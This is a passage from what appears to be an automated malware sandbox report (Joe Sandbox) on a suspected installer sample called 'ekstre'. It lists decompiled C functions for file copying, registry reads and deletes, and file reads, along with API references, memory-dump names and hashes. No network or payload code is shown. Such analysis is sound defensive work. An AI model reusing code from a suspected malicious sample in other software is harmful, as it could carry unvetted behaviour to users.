					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402103

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: ba118bcedaa8c7b1a8c5d955e9d14683423aace7369987c8eb7fbcaa50029e0f
Instruction ID: 47d4d566cceca616c63cef1e7df65318a890c8b7856780658557070bf90f6c25
Opcode Fuzzy Hash: ba118bcedaa8c7b1a8c5d955e9d14683423aace7369987c8eb7fbcaa50029e0f
Instruction Fuzzy Hash: C921D131904204FADF11AFA5CF4CA9DBA71BF48354F60413BF505B91E1DBBD8A829A1D

Uniqueness

Uniqueness Score: -1.00%

Function 004022FF Relevance: 4.6, APIs: 3, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022FF(void* __eflags) {
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t39;
				void* _t41;

				_t39 = E00402DA6(_t34);
				_t37 = E00402DA6(0x11);
				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
				if(E0040699E(_t39) != 0) {
					 *(_t41 - 0x70) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
					_t27 =  *((intOrPtr*)(_t41 + 8));
					 *(_t41 - 0x68) = _t39;
					 *(_t41 - 0x64) = _t37;
					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
					E004056CA(_t34, _t27);
					if(SHFileOperationW(_t41 - 0x70) != 0) {
						goto L1;
					}
				} else {
					L1:
					E004056CA(0xfffffff9, _t34); // executed
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x00402307
0x00402310
0x00402318
0x00402322
0x00402335
0x00402338
0x00402345
0x0040234f
0x00402354
0x0040235d
0x00402360
0x00402363
0x00402366
0x0040236a
0x0040237b
0x00000000
0x00402381
0x00402324
0x00402324
0x00402327
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

Part of subcall function 0040699E: FindFirstFileW.KERNELBASE(75D53420,0045E798,0045A750,00406088,0045A750,0045A750,00000000,0045A750,0045A750,75D53420,?,75D52EE0,00405D94,?,75D53420,75D52EE0), ref: 004069A9
Part of subcall function 0040699E: FindClose.KERNELBASE(00000000), ref: 004069B5

lstrlenW.KERNEL32 ref: 0040233F
lstrlenW.KERNEL32(00000000), ref: 0040234A
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 5f7eaeb0b6bb360fde5809f865612a34fdef61b34f57a823a254457453c684f7
Instruction ID: 3f413573ea27edd4ca9b32eedc1ce3c4e2f3c758105ad161833092bccc8995f3
Opcode Fuzzy Hash: 5f7eaeb0b6bb360fde5809f865612a34fdef61b34f57a823a254457453c684f7
Instruction Fuzzy Hash: 54117C71900318AADB10EFF9CA49E9EB6F8BF04344F10443BE505FB2D1EAB9C8448B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x1fff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x1fff); // executed
					}
					_t22[0x1fff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025D1
RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00020019), ref: 004025E4
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc76F4.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: e9c58060e7d54b773855fc80df063232a38d7bb896fb1600886a861cb1e2fc0b
Instruction ID: 77ecf9e51a0a31f861f8b6a470f9b6508cc9013fd6fdf14c98bc0c5cd18c1f9b
Opcode Fuzzy Hash: e9c58060e7d54b773855fc80df063232a38d7bb896fb1600886a861cb1e2fc0b
Instruction Fuzzy Hash: 1F017CB1904105ABEB159FA4DE5CAAEB67CEF40348F10403EF501B61D0EBB84E45966D

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83,0041E6F0,004035F5,?,?,004034F9,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83,00004000,?,00000000,004033A3), ref: 004061EF

Strings

<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83, xrefs: 004061DE

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileRead
String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83
API String ID: 2738559852-2121849026
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x4000;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x3ffe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x4702e8 =  *0x4702e8 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 0040255B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc76F4.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 2af3d259490a7814c3286edb17872a3d38606e6e67ad24fe28b048bdfcde783e
Instruction ID: f7ec3822b4f738fb8e8635393954ca42cecdc22d397d028f94b3ce30fcbb66f1
Opcode Fuzzy Hash: 2af3d259490a7814c3286edb17872a3d38606e6e67ad24fe28b048bdfcde783e
Instruction Fuzzy Hash: FF116D71900219EADF15DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x470290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x46824c =  *0x46824c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x46824c, 0x7530,  *0x468234), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 933049ac38a9dfba668b30bbb75d7fbb807da3e94af494bfd8c0503ec6455ea0
Instruction ID: 78bdf42a2e7415e9e902a73772ee10ad2712d102aa3be259db39fbfb79589c6f
Opcode Fuzzy Hash: 933049ac38a9dfba668b30bbb75d7fbb807da3e94af494bfd8c0503ec6455ea0
Instruction Fuzzy Hash: 4301F431621220DBE7195B389D15B2A3798E710714F10827FF855F65F1EA78CC029B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x0040243e
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 5b1b85d38eff07758285db1d1bcb6a25fdd3d1ba6666f1b5bc92a54ae4d7862b
Instruction ID: 89759c4c78bd8c1fec61b881f5013a478b380751c7fe3efe2e421c51a88c92a2
Opcode Fuzzy Hash: 5b1b85d38eff07758285db1d1bcb6a25fdd3d1ba6666f1b5bc92a54ae4d7862b
Instruction Fuzzy Hash: ECF0C232A00120EBDB11ABB89B4DAAD72A8AF44314F15443BE141B71C0DAFC4D01866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: e453346e6a2a61b80266914510a2d638701090c9bf32021c038cd7928819c43d
